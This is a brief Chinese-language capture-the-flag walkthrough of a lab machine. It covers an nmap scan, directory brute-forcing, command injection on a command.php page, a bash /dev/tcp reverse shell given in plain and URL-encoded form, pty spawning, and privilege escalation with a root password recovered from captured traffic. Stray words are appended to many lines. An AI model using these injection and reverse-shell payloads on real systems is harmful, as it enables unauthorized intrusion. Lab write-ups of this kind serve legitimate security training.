利用namp 先进行扫描获取ipphp
nmap 192.168.18.*python
获取ip 没发现80端口 主机存活 猜想能够是个2000之后的端口浏览器
nmap -p1-65533 192.168.18.146 返回bash
192.168.18.146:33447 开放33447端口服务器
利用御剑和进行burpsuit 爆破 获得tcp
imges ,index ,challenge 等目录 接着对其二次爆破post
cake 发现目录 /Magic_Boxui
继续对/challenge /Magic_Box 爆破 发现 发现low.php,command.phpspa
访问low.php是个空页面,访问command.php,发现命令执行界面 这个时候直接反弹 3d
输入 127.0.0.1&&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash 在post get 继续传递的时候 && 会被当初参数传递
这里咱们把 && 后门的转义 以后在bp 发包
IP=127.0.0.1%26%26%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%31%38%2e%31%2f%34%34%34%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68&submit=submit
这边接受到
接受输入 python -c 'import pty;pty.spawn("/bin/bash")'
能够执行su 命令终端 进去能够提权了
将这个文件放到能够访问位置 利用python 搭建一个临时服务器
cd /sbin/raw_vs_isi
能够直接下载 也能够利用 s
scp 进行本地远程下载
scp /sbin/raw_vs_isi/hint.pcapng yzj@192.168.18.134:/home/yzj
Are you sure you want to continue connecting (yes/no)? yes
yzj@192.168.18.134's password: a123456
成功 丢入 Wireshark 找到一个tcp 包 追踪tcp流量包
sudo -i 尝试提权
发现root 密码也是1337hax0r
查看cat flag.txt